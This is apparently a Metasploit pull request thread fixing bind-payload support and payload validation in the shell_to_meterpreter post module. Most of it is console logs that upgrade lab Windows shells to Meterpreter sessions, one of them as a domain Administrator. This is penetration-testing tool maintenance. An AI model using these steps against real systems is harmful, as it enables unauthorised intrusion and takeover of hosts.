shell_to_meterpreter: Support using bind payloads with PAYLOAD_OVERRIDE

[bcoles]

Fixes #17885
Fixes #17916

Before

[*] Command shell session 1 opened (192.168.200.130:1338 -> 192.168.200.190:50071) at 2023-04-22 01:45:31 -0400
msf6 > 
msf6 > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > set payload_override windows/x64/meterpreter/bind_tcp
payload_override => windows/x64/meterpreter/bind_tcp
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started bind TCP handler against :4433
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 

After

msf6 > 
[*] Sending stage (336 bytes) to 192.168.200.190
[*] Command shell session 1 opened (192.168.200.130:1338 -> 192.168.200.190:50070) at 2023-04-22 01:42:49 -0400

msf6 > 
msf6 > 
msf6 > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > set payload_override windows/x64/meterpreter/bind_tcp
payload_override => windows/x64/meterpreter/bind_tcp
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started bind TCP handler against 192.168.200.190:4433
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 
[*] Sending stage (200774 bytes) to 192.168.200.190
[*] Meterpreter session 2 opened (192.168.200.130:33359 -> 192.168.200.190:4433) at 2023-04-22 01:43:14 -0400
[*] Stopping exploit/multi/handler

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: TEST\user
smeterpreter > sysinfo
Computer        : TEST
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > 

---

Yes, I'm sure these changes also work on Windows 10 and Windows 11 (firewall rules and network routes permitting of course). No I didn't test. No I don't care.

Note: This PR does what it says on the tin. It does not fix the other 500 bugs in shell_to_meterpreter as these bugs are due to fundamental flaws which require the majority of the module to be rewritten.

[bcoles]

The appropriate rhost is detected and set automatically through Metasploit magic. Operators can manually select a rhost with set rhost <rhost> if they choose. Metasploit currently prevents manually setting an rhost (pending merge of #17911), but this is not a blocker for this PR.

[gwillcox-r7]

Confirmed #17916 is fixed:

msf6 payload(windows/x64/shell_bind_tcp) > 
[*] Started bind TCP handler against 192.168.64.138:4444
[*] Command shell session 1 opened (192.168.64.128:41021 -> 192.168.64.138:4444) at 2023-06-05 13:30:53 -0500

msf6 payload(windows/x64/shell_bind_tcp) > use post/multi/manage/shell_to_meterpreter 
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/shell_to_meterpreter) > set PAYLOAD_OVERRIDE windows/asdf
PAYLOAD_OVERRIDE => windows/asdf
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[-] Could not generate payload windows/asdf. Invalid payload?
[-] Unable to build a suitable payload for windows using payload windows/asdf.
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 

[gwillcox-r7]

And the other bug in #17885 is now fixed:

msf6 payload(windows/x64/shell_bind_tcp) > use post/multi/manage/shell_to_meterpreter 
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/shell_to_meterpreter) > set PAYLOAD_OVERRIDE windows/asdf
PAYLOAD_OVERRIDE => windows/asdf
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[-] Could not generate payload windows/asdf. Invalid payload?
[-] Unable to build a suitable payload for windows using payload windows/asdf.
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > set PAYLOAD_OVERRIDE windows/x64/meterpreter/bind_tcp
PAYLOAD_OVERRIDE => windows/x64/meterpreter/bind_tcp
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started bind TCP handler against 192.168.64.138:4433
[*] Sending stage (200774 bytes) to 192.168.64.138
[*] Meterpreter session 2 opened (192.168.64.128:35057 -> 192.168.64.138:4433) at 2023-06-05 13:33:45 -0500
[-] Failed to start exploit/multi/handler on 4433, it may be in use by another process.
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > jobs -K
Stopping all jobs...
msf6 post(multi/manage/shell_to_meterpreter) > exploit

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started bind TCP handler against 192.168.64.138:4433
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 
[*] Sending stage (200774 bytes) to 192.168.64.138
[*] Meterpreter session 3 opened (192.168.64.128:33563 -> 192.168.64.138:4433) at 2023-06-05 13:34:09 -0500
[*] Stopping exploit/multi/handler

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: DAFOREST\Administrator
meterpreter > sysinfo
Computer        : WIN-E72FSF87GO1
OS              : Windows 2016+ (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : DAFOREST
Logged On Users : 8
Meterpreter     : x64/windows
meterpreter > 

[gwillcox-r7]

Release Notes

Two bugs have been fixed in post/multi/manage/shell_to_meterpreter: one was caused by a lack of validation on the payload being used when using the PAYLOAD_OVERRIDE option to ensure the payload was valid, and one was caused by the module creating a handler but failing to pass the RHOST information along, causing the handler to run with an invalid configuration.